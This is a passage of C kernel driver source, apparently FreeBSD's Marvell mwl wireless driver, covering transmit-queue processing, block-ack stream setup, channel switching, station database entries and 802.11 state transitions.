(mwl_bastream_match(&mn->mn_ba[3], qos)) ds->TxPriority = mn->mn_ba[3].txq; #endif #if MWL_MAXBA > 2 else if (mwl_bastream_match(&mn->mn_ba[2], qos)) ds->TxPriority = mn->mn_ba[2].txq; #endif #if MWL_MAXBA > 1 else if (mwl_bastream_match(&mn->mn_ba[1], qos)) ds->TxPriority = mn->mn_ba[1].txq; #endif #if MWL_MAXBA > 0 else if (mwl_bastream_match(&mn->mn_ba[0], qos)) ds->TxPriority = mn->mn_ba[0].txq; #endif else ds->TxPriority = txq->qnum; } else ds->TxPriority = txq->qnum; break; default: if_printf(ifp, "bogus frame type 0x%x (%s)\n", wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK, __func__); sc->sc_stats.mst_tx_badframetype++; m_freem(m0); return EIO; } if (IFF_DUMPPKTS_XMIT(sc)) ieee80211_dump_pkt(ic, mtod(m0, const uint8_t *)+sizeof(uint16_t), m0->m_len - sizeof(uint16_t), ds->DataRate, -1); MWL_TXQ_LOCK(txq); ds->Status = htole32(EAGLE_TXD_STATUS_FW_OWNED); STAILQ_INSERT_TAIL(&txq->active, bf, bf_list); MWL_TXDESC_SYNC(txq, ds, BUS_DMASYNC_PREREAD | BUS_DMASYNC_PREWRITE); ifp->if_opackets++; sc->sc_tx_timer = 5; MWL_TXQ_UNLOCK(txq); return 0; #undef IEEE80211_DIR_DSTODS } static __inline int mwl_cvtlegacyrix(int rix) { #define N(x) (sizeof(x)/sizeof(x[0])) static const int ieeerates[] = { 2, 4, 11, 22, 44, 12, 18, 24, 36, 48, 72, 96, 108 }; return (rix < N(ieeerates) ? ieeerates[rix] : 0); #undef N } /* * Process completed xmit descriptors from the specified queue. */ static int mwl_tx_processq(struct mwl_softc *sc, struct mwl_txq *txq) { #define EAGLE_TXD_STATUS_MCAST \ (EAGLE_TXD_STATUS_MULTICAST_TX | EAGLE_TXD_STATUS_BROADCAST_TX) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mwl_txbuf *bf; struct mwl_txdesc *ds; struct ieee80211_node *ni; struct mwl_node *an; int nreaped; uint32_t status; DPRINTF(sc, MWL_DEBUG_TX_PROC, "%s: tx queue %u\n", __func__, txq->qnum); for (nreaped = 0;; nreaped++) { MWL_TXQ_LOCK(txq); bf = STAILQ_FIRST(&txq->active); if (bf == NULL) { MWL_TXQ_UNLOCK(txq); break; } ds = bf->bf_desc; MWL_TXDESC_SYNC(txq, ds, BUS_DMASYNC_POSTREAD | BUS_DMASYNC_POSTWRITE); if (ds->Status & htole32(EAGLE_TXD_STATUS_FW_OWNED)) { MWL_TXQ_UNLOCK(txq); break; } STAILQ_REMOVE_HEAD(&txq->active, bf_list); MWL_TXQ_UNLOCK(txq); #ifdef MWL_DEBUG if (sc->sc_debug & MWL_DEBUG_XMIT_DESC) mwl_printtxbuf(bf, txq->qnum, nreaped); #endif ni = bf->bf_node; if (ni != NULL) { an = MWL_NODE(ni); status = le32toh(ds->Status); if (status & EAGLE_TXD_STATUS_OK) { uint16_t Format = le16toh(ds->Format); uint8_t txant = MS(Format, EAGLE_TXD_ANTENNA); sc->sc_stats.mst_ant_tx[txant]++; if (status & EAGLE_TXD_STATUS_OK_RETRY) sc->sc_stats.mst_tx_retries++; if (status & EAGLE_TXD_STATUS_OK_MORE_RETRY) sc->sc_stats.mst_tx_mretries++; if (txq->qnum >= MWL_WME_AC_VO) ic->ic_wme.wme_hipri_traffic++; ni->ni_txrate = MS(Format, EAGLE_TXD_RATE); if ((Format & EAGLE_TXD_FORMAT_HT) == 0) { ni->ni_txrate = mwl_cvtlegacyrix( ni->ni_txrate); } else ni->ni_txrate |= IEEE80211_RATE_MCS; sc->sc_stats.mst_tx_rate = ni->ni_txrate; } else { if (status & EAGLE_TXD_STATUS_FAILED_LINK_ERROR) sc->sc_stats.mst_tx_linkerror++; if (status & EAGLE_TXD_STATUS_FAILED_XRETRY) sc->sc_stats.mst_tx_xretries++; if (status & EAGLE_TXD_STATUS_FAILED_AGING) sc->sc_stats.mst_tx_aging++; if (bf->bf_m->m_flags & M_FF) sc->sc_stats.mst_ff_txerr++; } /* * Do any tx complete callback. Note this must * be done before releasing the node reference. * XXX no way to figure out if frame was ACK'd */ if (bf->bf_m->m_flags & M_TXCB) { /* XXX strip fw len in case header inspected */ m_adj(bf->bf_m, sizeof(uint16_t)); ieee80211_process_callback(ni, bf->bf_m, (status & EAGLE_TXD_STATUS_OK) == 0); } /* * Reclaim reference to node. * * NB: the node may be reclaimed here if, for example * this is a DEAUTH message that was sent and the * node was timed out due to inactivity. */ ieee80211_free_node(ni); } ds->Status = htole32(EAGLE_TXD_STATUS_IDLE); bus_dmamap_sync(sc->sc_dmat, bf->bf_dmamap, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->sc_dmat, bf->bf_dmamap); m_freem(bf->bf_m); mwl_puttxbuf_tail(txq, bf); } return nreaped; #undef EAGLE_TXD_STATUS_MCAST } /* * Deferred processing of transmit interrupt; special-cased * for four hardware queues, 0-3. */ static void mwl_tx_proc(void *arg, int npending) { struct mwl_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; int nreaped; /* * Process each active queue. */ nreaped = 0; if (!STAILQ_EMPTY(&sc->sc_txq[0].active)) nreaped += mwl_tx_processq(sc, &sc->sc_txq[0]); if (!STAILQ_EMPTY(&sc->sc_txq[1].active)) nreaped += mwl_tx_processq(sc, &sc->sc_txq[1]); if (!STAILQ_EMPTY(&sc->sc_txq[2].active)) nreaped += mwl_tx_processq(sc, &sc->sc_txq[2]); if (!STAILQ_EMPTY(&sc->sc_txq[3].active)) nreaped += mwl_tx_processq(sc, &sc->sc_txq[3]); if (nreaped != 0) { ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; sc->sc_tx_timer = 0; if (!IFQ_IS_EMPTY(&ifp->if_snd)) { /* NB: kick fw; the tx thread may have been preempted */ mwl_hal_txstart(sc->sc_mh, 0); mwl_start(ifp); } } } static void mwl_tx_draintxq(struct mwl_softc *sc, struct mwl_txq *txq) { struct ieee80211_node *ni; struct mwl_txbuf *bf; u_int ix; /* * NB: this assumes output has been stopped and * we do not need to block mwl_tx_tasklet */ for (ix = 0;; ix++) { MWL_TXQ_LOCK(txq); bf = STAILQ_FIRST(&txq->active); if (bf == NULL) { MWL_TXQ_UNLOCK(txq); break; } STAILQ_REMOVE_HEAD(&txq->active, bf_list); MWL_TXQ_UNLOCK(txq); #ifdef MWL_DEBUG if (sc->sc_debug & MWL_DEBUG_RESET) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; const struct mwltxrec *tr = mtod(bf->bf_m, const struct mwltxrec *); mwl_printtxbuf(bf, txq->qnum, ix); ieee80211_dump_pkt(ic, (const uint8_t *)&tr->wh, bf->bf_m->m_len - sizeof(tr->fwlen), 0, -1); } #endif /* MWL_DEBUG */ bus_dmamap_unload(sc->sc_dmat, bf->bf_dmamap); ni = bf->bf_node; if (ni != NULL) { /* * Reclaim node reference. */ ieee80211_free_node(ni); } m_freem(bf->bf_m); mwl_puttxbuf_tail(txq, bf); } } /* * Drain the transmit queues and reclaim resources. */ static void mwl_draintxq(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int i; for (i = 0; i < MWL_NUM_TX_QUEUES; i++) mwl_tx_draintxq(sc, &sc->sc_txq[i]); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; sc->sc_tx_timer = 0; } #ifdef MWL_DIAGAPI /* * Reset the transmit queues to a pristine state after a fw download. */ static void mwl_resettxq(struct mwl_softc *sc) { int i; for (i = 0; i < MWL_NUM_TX_QUEUES; i++) mwl_txq_reset(sc, &sc->sc_txq[i]); } #endif /* MWL_DIAGAPI */ /* * Clear the transmit queues of any frames submitted for the * specified vap. This is done when the vap is deleted so we * don't potentially reference the vap after it is gone. * Note we cannot remove the frames; we only reclaim the node * reference. */ static void mwl_cleartxq(struct mwl_softc *sc, struct ieee80211vap *vap) { struct mwl_txq *txq; struct mwl_txbuf *bf; int i; for (i = 0; i < MWL_NUM_TX_QUEUES; i++) { txq = &sc->sc_txq[i]; MWL_TXQ_LOCK(txq); STAILQ_FOREACH(bf, &txq->active, bf_list) { struct ieee80211_node *ni = bf->bf_node; if (ni != NULL && ni->ni_vap == vap) { bf->bf_node = NULL; ieee80211_free_node(ni); } } MWL_TXQ_UNLOCK(txq); } } static int mwl_recv_action(struct ieee80211_node *ni, const struct ieee80211_frame *wh, const uint8_t *frm, const uint8_t *efrm) { struct mwl_softc *sc = ni->ni_ic->ic_ifp->if_softc; const struct ieee80211_action *ia; ia = (const struct ieee80211_action *) frm; if (ia->ia_category == IEEE80211_ACTION_CAT_HT && ia->ia_action == IEEE80211_ACTION_HT_MIMOPWRSAVE) { const struct ieee80211_action_ht_mimopowersave *mps = (const struct ieee80211_action_ht_mimopowersave *) ia; mwl_hal_setmimops(sc->sc_mh, ni->ni_macaddr, mps->am_control & IEEE80211_A_HT_MIMOPWRSAVE_ENA, MS(mps->am_control, IEEE80211_A_HT_MIMOPWRSAVE_MODE)); return 0; } else return sc->sc_recv_action(ni, wh, frm, efrm); } static int mwl_addba_request(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int dialogtoken, int baparamset, int batimeout) { struct mwl_softc *sc = ni->ni_ic->ic_ifp->if_softc; struct ieee80211vap *vap = ni->ni_vap; struct mwl_node *mn = MWL_NODE(ni); struct mwl_bastate *bas; bas = tap->txa_private; if (bas == NULL) { const MWL_HAL_BASTREAM *sp; /* * Check for a free BA stream slot. */ #if MWL_MAXBA > 3 if (mn->mn_ba[3].bastream == NULL) bas = &mn->mn_ba[3]; else #endif #if MWL_MAXBA > 2 if (mn->mn_ba[2].bastream == NULL) bas = &mn->mn_ba[2]; else #endif #if MWL_MAXBA > 1 if (mn->mn_ba[1].bastream == NULL) bas = &mn->mn_ba[1]; else #endif #if MWL_MAXBA > 0 if (mn->mn_ba[0].bastream == NULL) bas = &mn->mn_ba[0]; else #endif { /* sta already has max BA streams */ /* XXX assign BA stream to highest priority tid */ DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: already has max bastreams\n", __func__); sc->sc_stats.mst_ampdu_reject++; return 0; } /* NB: no held reference to ni */ sp = mwl_hal_bastream_alloc(MWL_VAP(vap)->mv_hvap, (baparamset & IEEE80211_BAPS_POLICY_IMMEDIATE) != 0, ni->ni_macaddr, tap->txa_tid, ni->ni_htparam, ni, tap); if (sp == NULL) { /* * No available stream, return 0 so no * a-mpdu aggregation will be done. */ DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: no bastream available\n", __func__); sc->sc_stats.mst_ampdu_nostream++; return 0; } DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: alloc bastream %p\n", __func__, sp); /* NB: qos is left zero so we won't match in mwl_tx_start */ bas->bastream = sp; tap->txa_private = bas; } /* fetch current seq# from the firmware; if available */ if (mwl_hal_bastream_get_seqno(sc->sc_mh, bas->bastream, vap->iv_opmode == IEEE80211_M_STA ? vap->iv_myaddr : ni->ni_macaddr, &tap->txa_start) != 0) tap->txa_start = 0; return sc->sc_addba_request(ni, tap, dialogtoken, baparamset, batimeout); } static int mwl_addba_response(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap, int code, int baparamset, int batimeout) { struct mwl_softc *sc = ni->ni_ic->ic_ifp->if_softc; struct mwl_bastate *bas; bas = tap->txa_private; if (bas == NULL) { /* XXX should not happen */ DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: no BA stream allocated, TID %d\n", __func__, tap->txa_tid); sc->sc_stats.mst_addba_nostream++; return 0; } if (code == IEEE80211_STATUS_SUCCESS) { struct ieee80211vap *vap = ni->ni_vap; int bufsiz, error; /* * Tell the firmware to setup the BA stream; * we know resources are available because we * pre-allocated one before forming the request. */ bufsiz = MS(baparamset, IEEE80211_BAPS_BUFSIZ); if (bufsiz == 0) bufsiz = IEEE80211_AGGR_BAWMAX; error = mwl_hal_bastream_create(MWL_VAP(vap)->mv_hvap, bas->bastream, bufsiz, bufsiz, tap->txa_start); if (error != 0) { /* * Setup failed, return immediately so no a-mpdu * aggregation will be done. */ mwl_hal_bastream_destroy(sc->sc_mh, bas->bastream); mwl_bastream_free(bas); tap->txa_private = NULL; DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: create failed, error %d, bufsiz %d TID %d " "htparam 0x%x\n", __func__, error, bufsiz, tap->txa_tid, ni->ni_htparam); sc->sc_stats.mst_bacreate_failed++; return 0; } /* NB: cache txq to avoid ptr indirect */ mwl_bastream_setup(bas, tap->txa_tid, bas->bastream->txq); DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: bastream %p assigned to txq %d TID %d bufsiz %d " "htparam 0x%x\n", __func__, bas->bastream, bas->txq, tap->txa_tid, bufsiz, ni->ni_htparam); } else { /* * Other side NAK'd us; return the resources. */ DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: request failed with code %d, destroy bastream %p\n", __func__, code, bas->bastream); mwl_hal_bastream_destroy(sc->sc_mh, bas->bastream); mwl_bastream_free(bas); tap->txa_private = NULL; } /* NB: firmware sends BAR so we don't need to */ return sc->sc_addba_response(ni, tap, code, baparamset, batimeout); } static void mwl_addba_stop(struct ieee80211_node *ni, struct ieee80211_tx_ampdu *tap) { struct mwl_softc *sc = ni->ni_ic->ic_ifp->if_softc; struct mwl_bastate *bas; bas = tap->txa_private; if (bas != NULL) { DPRINTF(sc, MWL_DEBUG_AMPDU, "%s: destroy bastream %p\n", __func__, bas->bastream); mwl_hal_bastream_destroy(sc->sc_mh, bas->bastream); mwl_bastream_free(bas); tap->txa_private = NULL; } sc->sc_addba_stop(ni, tap); } /* * Setup the rx data structures. This should only be * done once or we may get out of sync with the firmware. */ static int mwl_startrecv(struct mwl_softc *sc) { if (!sc->sc_recvsetup) { struct mwl_rxbuf *bf, *prev; struct mwl_rxdesc *ds; prev = NULL; STAILQ_FOREACH(bf, &sc->sc_rxbuf, bf_list) { int error = mwl_rxbuf_init(sc, bf); if (error != 0) { DPRINTF(sc, MWL_DEBUG_RECV, "%s: mwl_rxbuf_init failed %d\n", __func__, error); return error; } if (prev != NULL) { ds = prev->bf_desc; ds->pPhysNext = htole32(bf->bf_daddr); } prev = bf; } if (prev != NULL) { ds = prev->bf_desc; ds->pPhysNext = htole32(STAILQ_FIRST(&sc->sc_rxbuf)->bf_daddr); } sc->sc_recvsetup = 1; } mwl_mode_init(sc); /* set filters, etc. */ return 0; } static MWL_HAL_APMODE mwl_getapmode(const struct ieee80211vap *vap, struct ieee80211_channel *chan) { MWL_HAL_APMODE mode; if (IEEE80211_IS_CHAN_HT(chan)) { if (vap->iv_flags_ht & IEEE80211_FHT_PUREN) mode = AP_MODE_N_ONLY; else if (IEEE80211_IS_CHAN_5GHZ(chan)) mode = AP_MODE_AandN; else if (vap->iv_flags & IEEE80211_F_PUREG) mode = AP_MODE_GandN; else mode = AP_MODE_BandGandN; } else if (IEEE80211_IS_CHAN_ANYG(chan)) { if (vap->iv_flags & IEEE80211_F_PUREG) mode = AP_MODE_G_ONLY; else mode = AP_MODE_MIXED; } else if (IEEE80211_IS_CHAN_B(chan)) mode = AP_MODE_B_ONLY; else if (IEEE80211_IS_CHAN_A(chan)) mode = AP_MODE_A_ONLY; else mode = AP_MODE_MIXED; /* XXX should not happen? */ return mode; } static int mwl_setapmode(struct ieee80211vap *vap, struct ieee80211_channel *chan) { struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; return mwl_hal_setapmode(hvap, mwl_getapmode(vap, chan)); } /* * Set/change channels. */ static int mwl_chan_set(struct mwl_softc *sc, struct ieee80211_channel *chan) { struct mwl_hal *mh = sc->sc_mh; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; MWL_HAL_CHANNEL hchan; int maxtxpow; DPRINTF(sc, MWL_DEBUG_RESET, "%s: chan %u MHz/flags 0x%x\n", __func__, chan->ic_freq, chan->ic_flags); /* * Convert to a HAL channel description with * the flags constrained to reflect the current * operating mode. */ mwl_mapchan(&hchan, chan); mwl_hal_intrset(mh, 0); /* disable interrupts */ #if 0 mwl_draintxq(sc); /* clear pending tx frames */ #endif mwl_hal_setchannel(mh, &hchan); /* * Tx power is cap'd by the regulatory setting and * possibly a user-set limit. We pass the min of * these to the hal to apply them to the cal data * for this channel. * XXX min bound? */ maxtxpow = 2*chan->ic_maxregpower; if (maxtxpow > ic->ic_txpowlimit) maxtxpow = ic->ic_txpowlimit; mwl_hal_settxpower(mh, &hchan, maxtxpow / 2); /* NB: potentially change mcast/mgt rates */ mwl_setcurchanrates(sc); /* * Update internal state. */ sc->sc_tx_th.wt_chan_freq = htole16(chan->ic_freq); sc->sc_rx_th.wr_chan_freq = htole16(chan->ic_freq); if (IEEE80211_IS_CHAN_A(chan)) { sc->sc_tx_th.wt_chan_flags = htole16(IEEE80211_CHAN_A); sc->sc_rx_th.wr_chan_flags = htole16(IEEE80211_CHAN_A); } else if (IEEE80211_IS_CHAN_ANYG(chan)) { sc->sc_tx_th.wt_chan_flags = htole16(IEEE80211_CHAN_G); sc->sc_rx_th.wr_chan_flags = htole16(IEEE80211_CHAN_G); } else { sc->sc_tx_th.wt_chan_flags = htole16(IEEE80211_CHAN_B); sc->sc_rx_th.wr_chan_flags = htole16(IEEE80211_CHAN_B); } sc->sc_curchan = hchan; mwl_hal_intrset(mh, sc->sc_imask); return 0; } static void mwl_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct mwl_softc *sc = ifp->if_softc; DPRINTF(sc, MWL_DEBUG_STATE, "%s\n", __func__); } static void mwl_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct mwl_softc *sc = ifp->if_softc; DPRINTF(sc, MWL_DEBUG_STATE, "%s\n", __func__); } static void mwl_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct mwl_softc *sc = ifp->if_softc; (void) mwl_chan_set(sc, ic->ic_curchan); } /* * Handle a channel switch request. We inform the firmware * and mark the global state to suppress various actions. * NB: we issue only one request to the fw; we may be called * multiple times if there are multiple vap's. */ static void mwl_startcsa(struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct mwl_softc *sc = ic->ic_ifp->if_softc; MWL_HAL_CHANNEL hchan; if (sc->sc_csapending) return; mwl_mapchan(&hchan, ic->ic_csa_newchan); /* 1 =>'s quiet channel */ mwl_hal_setchannelswitchie(sc->sc_mh, &hchan, 1, ic->ic_csa_count); sc->sc_csapending = 1; } /* * Plumb any static WEP key for the station. This is * necessary as we must propagate the key from the * global key table of the vap to each sta db entry. */ static void mwl_setanywepkey(struct ieee80211vap *vap, const uint8_t mac[IEEE80211_ADDR_LEN]) { if ((vap->iv_flags & (IEEE80211_F_PRIVACY|IEEE80211_F_WPA)) == IEEE80211_F_PRIVACY && vap->iv_def_txkey != IEEE80211_KEYIX_NONE && vap->iv_nw_keys[vap->iv_def_txkey].wk_keyix != IEEE80211_KEYIX_NONE) (void) mwl_key_set(vap, &vap->iv_nw_keys[vap->iv_def_txkey], mac); } static int mwl_peerstadb(struct ieee80211_node *ni, int aid, int staid, MWL_HAL_PEERINFO *pi) { #define WME(ie) ((const struct ieee80211_wme_info *) ie) struct ieee80211vap *vap = ni->ni_vap; struct mwl_hal_vap *hvap; int error; if (vap->iv_opmode == IEEE80211_M_WDS) { /* * WDS vap's do not have a f/w vap; instead they piggyback * on an AP vap and we must install the sta db entry and * crypto state using that AP's handle (the WDS vap has none). */ hvap = MWL_VAP(vap)->mv_ap_hvap; } else hvap = MWL_VAP(vap)->mv_hvap; error = mwl_hal_newstation(hvap, ni->ni_macaddr, aid, staid, pi, ni->ni_flags & (IEEE80211_NODE_QOS | IEEE80211_NODE_HT), ni->ni_ies.wme_ie != NULL ? WME(ni->ni_ies.wme_ie)->wme_info : 0); if (error == 0) { /* * Setup security for this station. For sta mode this is * needed even though do the same thing on transition to * AUTH state because the call to mwl_hal_newstation * clobbers the crypto state we setup. */ mwl_setanywepkey(vap, ni->ni_macaddr); } return error; #undef WME } static void mwl_setglobalkeys(struct ieee80211vap *vap) { struct ieee80211_key *wk; wk = &vap->iv_nw_keys[0]; for (; wk < &vap->iv_nw_keys[IEEE80211_WEP_NKID]; wk++) if (wk->wk_keyix != IEEE80211_KEYIX_NONE) (void) mwl_key_set(vap, wk, vap->iv_myaddr); } /* * Convert a legacy rate set to a firmware bitmask. */ static uint32_t get_rate_bitmap(const struct ieee80211_rateset *rs) { uint32_t rates; int i; rates = 0; for (i = 0; i < rs->rs_nrates; i++) switch (rs->rs_rates[i] & IEEE80211_RATE_VAL) { case 2: rates |= 0x001; break; case 4: rates |= 0x002; break; case 11: rates |= 0x004; break; case 22: rates |= 0x008; break; case 44: rates |= 0x010; break; case 12: rates |= 0x020; break; case 18: rates |= 0x040; break; case 24: rates |= 0x080; break; case 36: rates |= 0x100; break; case 48: rates |= 0x200; break; case 72: rates |= 0x400; break; case 96: rates |= 0x800; break; case 108: rates |= 0x1000; break; } return rates; } /* * Construct an HT firmware bitmask from an HT rate set. */ static uint32_t get_htrate_bitmap(const struct ieee80211_htrateset *rs) { uint32_t rates; int i; rates = 0; for (i = 0; i < rs->rs_nrates; i++) { if (rs->rs_rates[i] < 16) rates |= 1<rs_rates[i]; } return rates; } /* * Craft station database entry for station. * NB: use host byte order here, the hal handles byte swapping. */ static MWL_HAL_PEERINFO * mkpeerinfo(MWL_HAL_PEERINFO *pi, const struct ieee80211_node *ni) { const struct ieee80211vap *vap = ni->ni_vap; memset(pi, 0, sizeof(*pi)); pi->LegacyRateBitMap = get_rate_bitmap(&ni->ni_rates); pi->CapInfo = ni->ni_capinfo; if (ni->ni_flags & IEEE80211_NODE_HT) { /* HT capabilities, etc */ pi->HTCapabilitiesInfo = ni->ni_htcap; /* XXX pi.HTCapabilitiesInfo */ pi->MacHTParamInfo = ni->ni_htparam; pi->HTRateBitMap = get_htrate_bitmap(&ni->ni_htrates); pi->AddHtInfo.ControlChan = ni->ni_htctlchan; pi->AddHtInfo.AddChan = ni->ni_ht2ndchan; pi->AddHtInfo.OpMode = ni->ni_htopmode; pi->AddHtInfo.stbc = ni->ni_htstbc; /* constrain according to local configuration */ if ((vap->iv_flags_ht & IEEE80211_FHT_SHORTGI40) == 0) pi->HTCapabilitiesInfo &= ~IEEE80211_HTCAP_SHORTGI40; if ((vap->iv_flags_ht & IEEE80211_FHT_SHORTGI20) == 0) pi->HTCapabilitiesInfo &= ~IEEE80211_HTCAP_SHORTGI20; if (ni->ni_chw != 40) pi->HTCapabilitiesInfo &= ~IEEE80211_HTCAP_CHWIDTH40; } return pi; } /* * Re-create the local sta db entry for a vap to ensure * up to date WME state is pushed to the firmware. Because * this resets crypto state this must be followed by a * reload of any keys in the global key table. */ static int mwl_localstadb(struct ieee80211vap *vap) { #define WME(ie) ((const struct ieee80211_wme_info *) ie) struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; struct ieee80211_node *bss; MWL_HAL_PEERINFO pi; int error; switch (vap->iv_opmode) { case IEEE80211_M_STA: bss = vap->iv_bss; error = mwl_hal_newstation(hvap, vap->iv_myaddr, 0, 0, vap->iv_state == IEEE80211_S_RUN ? mkpeerinfo(&pi, bss) : NULL, (bss->ni_flags & (IEEE80211_NODE_QOS | IEEE80211_NODE_HT)), bss->ni_ies.wme_ie != NULL ? WME(bss->ni_ies.wme_ie)->wme_info : 0); if (error == 0) mwl_setglobalkeys(vap); break; case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: error = mwl_hal_newstation(hvap, vap->iv_myaddr, 0, 0, NULL, vap->iv_flags & IEEE80211_F_WME, 0); if (error == 0) mwl_setglobalkeys(vap); break; default: error = 0; break; } return error; #undef WME } static int mwl_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct mwl_vap *mvp = MWL_VAP(vap); struct mwl_hal_vap *hvap = mvp->mv_hvap; struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni = NULL; struct ifnet *ifp = ic->ic_ifp; struct mwl_softc *sc = ifp->if_softc; struct mwl_hal *mh = sc->sc_mh; enum ieee80211_state ostate = vap->iv_state; int error; DPRINTF(sc, MWL_DEBUG_STATE, "%s: %s: %s -> %s\n", vap->iv_ifp->if_xname, __func__, ieee80211_state_name[ostate], ieee80211_state_name[nstate]); callout_stop(&sc->sc_timer); /* * Clear current radar detection state. */ if (ostate == IEEE80211_S_CAC) { /* stop quiet mode radar detection */ mwl_hal_setradardetection(mh, DR_CHK_CHANNEL_AVAILABLE_STOP); } else if (sc->sc_radarena) { /* stop in-service radar detection */ mwl_hal_setradardetection(mh, DR_DFS_DISABLE); sc->sc_radarena = 0; } /* * Carry out per-state actions before doing net80211 work. */ if (nstate == IEEE80211_S_INIT) { /* NB: only ap+sta vap's have a fw entity */ if (hvap != NULL) mwl_hal_stop(hvap); } else if (nstate == IEEE80211_S_SCAN) { mwl_hal_start(hvap); /* NB: this disables beacon frames */ mwl_hal_setinframode(hvap); } else if (nstate == IEEE80211_S_AUTH) { /* * Must create a sta db entry in case a WEP key needs to * be plumbed. This entry will be overwritten if we * associate; otherwise it will be reclaimed on node free. */ ni = vap->iv_bss; MWL_NODE(ni)->mn_hvap = hvap; (void) mwl_peerstadb(ni, 0, 0, NULL); } else if (nstate == IEEE80211_S_CSA) { /* XXX move to below? */ if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_MBSS) mwl_startcsa(vap); } else if (nstate == IEEE80211_S_CAC) { /* XXX move to below? */ /* stop ap xmit and enable quiet mode radar detection */ mwl_hal_setradardetection(mh, DR_CHK_CHANNEL_AVAILABLE_START); } /* * Invoke the parent method to do net80211 work. */ error = mvp->mv_newstate(vap, nstate, arg); /* * Carry out work that must be done after net80211 runs; * this work requires up to date state (e.g. iv_bss). */ if (error == 0 && nstate == IEEE80211_S_RUN) { /* NB: collect bss node again, it may have changed */ ni = vap->iv_bss; DPRINTF(sc, MWL_DEBUG_STATE, "%s: %s(RUN): iv_flags 0x%08x bintvl %d bssid %s " "capinfo 0x%04x chan %d\n", vap->iv_ifp->if_xname, __func__, vap->iv_flags, ni->ni_intval, ether_sprintf(ni->ni_bssid), ni->ni_capinfo, ieee80211_chan2ieee(ic, ic->ic_curchan)); /* * Recreate local sta db entry to update WME/HT state. */ mwl_localstadb(vap); switch (vap->iv_opmode) { case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: if (ostate == IEEE80211_S_CAC) { /* enable in-service radar detection */ mwl_hal_setradardetection(mh, DR_IN_SERVICE_MONITOR_START); sc->sc_radarena = 1; } /* * Allocate and setup the beacon frame * (and related state). */ error = mwl_reset_vap(vap, IEEE80211_S_RUN); if (error != 0) { DPRINTF(sc, MWL_DEBUG_STATE, "%s: beacon setup failed, error %d\n", __func__, error); goto bad; } /* NB: must be after setting up beacon */ mwl_hal_start(hvap); break; case IEEE80211_M_STA: DPRINTF(sc, MWL_DEBUG_STATE, "%s: %s: aid 0x%x\n", vap->iv_ifp->if_xname, __func__, ni->ni_associd); /* * Set state now that we're associated. */ mwl_hal_setassocid(hvap, ni->ni_bssid, ni->ni_associd); mwl_setrates(vap); mwl_hal_setrtsthreshold(hvap, vap->iv_rtsthreshold); if ((vap->iv_flags & IEEE80211_F_DWDS) && sc->sc_ndwdsvaps++ == 0) mwl_hal_setdwds(mh, 1); break; case IEEE80211_M_WDS: DPRINTF(sc, MWL_DEBUG_STATE, "%s: %s: bssid %s\n", vap->iv_ifp->if_xname, __func__, ether_sprintf(ni->ni_bssid)); mwl_seteapolformat(vap); break; default: break; } /* * Set CS mode according to operating channel; * this mostly an optimization for 5GHz. * * NB: must follow mwl_hal_start which resets csmode */ if (IEEE80211_IS_CHAN_5GHZ(ic->ic_bsschan)) mwl_hal_setcsmode(mh, CSMODE_AGGRESSIVE); else mwl_hal_setcsmode(mh, CSMODE_AUTO_ENA); /* * Start timer to prod firmware. */ if (sc->sc_ageinterval != 0) callout_reset(&sc->sc_timer, sc->sc_ageinterval*hz, mwl_agestations, sc); } else if (nstate == IEEE80211_S_SLEEP) { /* XXX set chip in power save */ } else if ((vap->iv_flags & IEEE80211_F_DWDS) && --sc->sc_ndwdsvaps == 0) mwl_hal_setdwds(mh, 0); bad: return error; } /* * Manage station id's; these are separate from AID's * as AID's may have values out of the range of possible * station id's acceptable to the firmware. */ static int allocstaid(struct mwl_softc *sc, int aid) { int staid; if (!(0 < aid && aid < MWL_MAXSTAID) || isset(sc->sc_staid, aid)) { /* NB: don't use 0 */ for (staid = 1; staid < MWL_MAXSTAID; staid++) if (isclr(sc->sc_staid, staid)) break; } else staid = aid; setbit(sc->sc_staid, staid); return staid; } static void delstaid(struct mwl_softc *sc, int staid) { clrbit(sc->sc_staid, staid); } /* * Setup driver-specific state for a newly associated node. * Note that we're called also on a re-associate, the isnew * param tells us if this is the first time or not. */ static void mwl_newassoc(struct ieee80211_node *ni, int isnew) { struct ieee80211vap *vap = ni->ni_vap; struct mwl_softc *sc = vap->iv_ic->ic_ifp->if_softc; struct mwl_node *mn = MWL_NODE(ni); MWL_HAL_PEERINFO pi; uint16_t aid; int error; aid = IEEE80211_AID(ni->ni_associd); if (isnew) { mn->mn_staid = allocstaid(sc, aid); mn->mn_hvap = MWL_VAP(vap)->mv_hvap; } else { mn = MWL_NODE(ni); /* XXX reset BA stream? */ } DPRINTF(sc, MWL_DEBUG_NODE, "%s: mac %s isnew %d aid %d staid %d\n", __func__, ether_sprintf(ni->ni_macaddr), isnew, aid, mn->mn_staid); error = mwl_peerstadb(ni, aid, mn->mn_staid, 